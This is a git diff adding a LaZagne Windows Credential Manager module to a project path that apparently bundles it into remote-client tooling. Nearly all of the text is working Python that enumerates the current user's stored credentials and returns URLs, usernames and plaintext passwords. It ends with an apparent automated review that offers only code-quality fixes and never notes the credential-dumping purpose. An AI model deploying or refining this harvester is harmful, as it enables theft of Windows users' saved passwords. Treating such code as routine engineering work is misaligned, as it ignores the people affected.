Diffstat (limited to 'foreign/client_handling/lazagne/softwares/windows/credman.py')
-rw-r--r--foreign/client_handling/lazagne/softwares/windows/credman.py34
1 files changed, 34 insertions, 0 deletions
diff --git a/foreign/client_handling/lazagne/softwares/windows/credman.py b/foreign/client_handling/lazagne/softwares/windows/credman.py
new file mode 100644
index 0000000..309a125
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/credman.py
@@ -0,0 +1,34 @@
+# -*- coding: utf-8 -*-
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import *
+
+
+class Credman(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'credman', 'windows', only_from_current_user=True)
+
+ def run(self):
+ pwd_found = []
+ # FOR XP
+ # - password are encrypted with specific salt depending on its Type
+ # entropy = 'abe2869f-9b47-4cd9-a358-c22904dba7f7\\0' # FOR CRED_TYPE_GENERIC
+ # entropy = '82BD0E67-9FEA-4748-8672-D5EFE5B779B0\\0' # FOR CRED_TYPE_DOMAIN_VISIBLE_PASSWORD
+ # CryptUnprotectData(byref(blobIn),None,byref(blobEntropy),None,None,CRYPTPROTECT_UI_FORBIDDEN,byref(blobOut))
+
+ creds = POINTER(PCREDENTIAL)()
+ count = c_ulong()
+
+ if CredEnumerate(None, 0, byref(count), byref(creds)) == 1:
+ for i in range(count.value):
+ c = creds[i].contents
+ if c.Type == CRED_TYPE_GENERIC or c.Type == CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
+ # Remove password too long
+ if c.CredentialBlobSize.real < 200:
+ pwd_found.append({
+ 'URL': c.TargetName,
+ 'Login': c.UserName,
+ 'Password': c.CredentialBlob[:c.CredentialBlobSize.real] # \\x00 could be deleted
+ })
+
+ CredFree(creds)
+ return pwd_found
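Review bot: The placement of `CredFree(creds)` relative to the `if CredEnumerate(...)` branch cannot be recovered here because the rendered diff has lost its indentation; if it sits outside that branch it runs on a null `creds` pointer whenever enumeration fails, so it should stay inside the success branch (or be guarded with `if creds:`). The success test `== 1` compares a Win32 BOOL against exactly 1 where a plain truthiness check, `if CredEnumerate(None, 0, byref(count), byref(creds)):`, is the conventional form. The wildcard `from ...winstructure import *` hides where `CredEnumerate`, `CredFree`, `PCREDENTIAL` and the `CRED_TYPE_*` constants come from, and the commented-out XP entropy block together with the redundant `.real` on `CredentialBlobSize` are dead weight worth dropping. The comment `# Remove password too long` describes a filter rather than a removal; `# Skip credential blobs of 200 bytes or more` states what the code does.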